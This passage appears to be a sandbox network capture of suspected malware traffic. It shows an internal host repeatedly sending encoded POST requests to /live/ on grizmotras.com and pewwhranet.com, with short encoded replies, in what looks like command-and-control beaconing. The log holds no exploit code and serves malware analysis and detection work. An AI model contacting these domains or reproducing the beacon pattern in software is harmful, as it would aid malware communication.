2024-04-26 21:23:15 UTC	580	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:23:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZaxAYVS75holcdbtqsfh5A%2F%2FCPljdtOoVYOQaYWjOr%2BVVjBJhpWnW6AeskH9BX7iRRnW6RqZV6%2BDHINj4P2dmz5jbooiPksufQ7DJzFX%2F1mDvwcZ72W3rrW3jdrQLNzO5g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a1ee684131d7-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:23:15 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:23:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49825	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:15 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:15 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49826	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:20 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:20 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49827	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:24 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:24 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49828	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:28 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:28 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49829	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:33 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:33 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBcnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:23:37 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:23:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZhZA96ENz3pC3A329LTMBFQ9PqUkV7SD%2BrPqYzaj7sPHqN%2FSWYuxsEKiFuWGe2V9jH349Du5pxuWhyNYIUnP8hxitnd7SsBp6h7AIYpRDDE5Agc%2FhLvvdRAeVa9UVa9x3w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a2758a0ea570-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:23:37 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:23:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49830	172.67.219.28	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:37 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:37 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49831	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:41 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:41 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49832	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:46 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:46 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49833	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:50 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:50 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49834	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:54 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:54 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49835	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:23:58 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:23:58 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	49836	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:03 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:03 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvBMnRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=
2024-04-26 21:24:06 UTC	576	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:24:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lWrsJGpTBcPP5j5hQUHHyLx34fVKBSHemZ2OtW8L%2BblkibJ%2BjLDHLvlUHWYn77qSQ5LLps%2FdlupCftXcN97YaobsGc4sE9shyXjqXyy8j1Jb2gpiuzcrR9e7eQyxXWDSaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a9a331bcc8748e-MIA alt-svc: h3=":443"; ma=86400
2024-04-26 21:24:06 UTC	118	IN	Data Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
2024-04-26 21:24:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	49837	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:07 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:07 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	49838	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:11 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: pewwhranet.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:11 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 2f 61 6d 73 64 31 42 57 32 69 30 71 70 6b 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8/amsd1BW2i0qpkHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	49839	104.21.59.82	443

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:24:15 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-26 21:24:15 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 54 35 78 33 48 39 39 57 70 4c 57 4b 4f 56 62 6e 78 36 79 49 70 77 64 48 78 6d 72 42 38 6d 58 4b 6e 63 70 43 51 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 64 69 48 31 44 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 6b 4f 75 65 34 42 48 61 30 39 56 39 2b 39 4b 58 38 36 72 36 79 65 6c 56 4c 7a 7a 45 75 6f 55 48 59 45 48 6b 3d Data Ascii: YjOeEyiMk3RvB8nRAuSOBaZcysivUksT5x3H99WpLWKOVbnx6yIpwdHxmrB8mXKncpCQEaladd8ChZLHKfeppcTqPmDGfhvItzdiH1DIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX86r6yelVLzzEuoUHYEHk=

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	49840	172.67.197.34	443

Timestamp	Bytes transferred	Direction	Data
